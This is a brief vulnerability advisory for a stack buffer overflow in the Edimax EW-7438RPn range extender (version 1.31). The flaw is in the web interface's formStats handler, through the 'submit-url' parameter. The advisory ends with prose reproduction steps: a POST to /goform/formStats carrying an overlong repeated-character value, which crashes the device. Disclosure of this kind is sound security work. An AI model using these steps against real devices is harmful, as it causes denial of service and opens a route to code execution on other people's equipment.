Edimax EW-7438RPn Stack-Based Buffer Overflow Vulnerability in formStats Function

A stack-based buffer overflow vulnerability has been identified in the Edimax EW-7438RPn range extender, specifically in version 1.31. The issue arises in the 'formStats' function of the device's web interface, where the 'submit-url' parameter is not properly validated. This lack of input sanitization allows remote attackers to manipulate the parameter, leading to a buffer overflow that can overwrite the function's return address and potentially execute arbitrary code. Exploitation of this vulnerability causes the device to crash and disrupt its normal functioning.

Impact

Exploitation of this vulnerability leads to a stack-based buffer overflow, allowing for arbitrary code execution. However, the immediate effect of the exploitation is to crash the device, causing a denial of service.

Reproduction

The vulnerability can be reproduced by sending a POST request to the '/goform/formStats' endpoint. The request must include a 'submit-url' parameter with a payload that is sufficiently long to cause a stack overflow. This can be done by using a string of repeated characters that exceeds the buffer's capacity, which will overwrite the return address and cause the device to crash.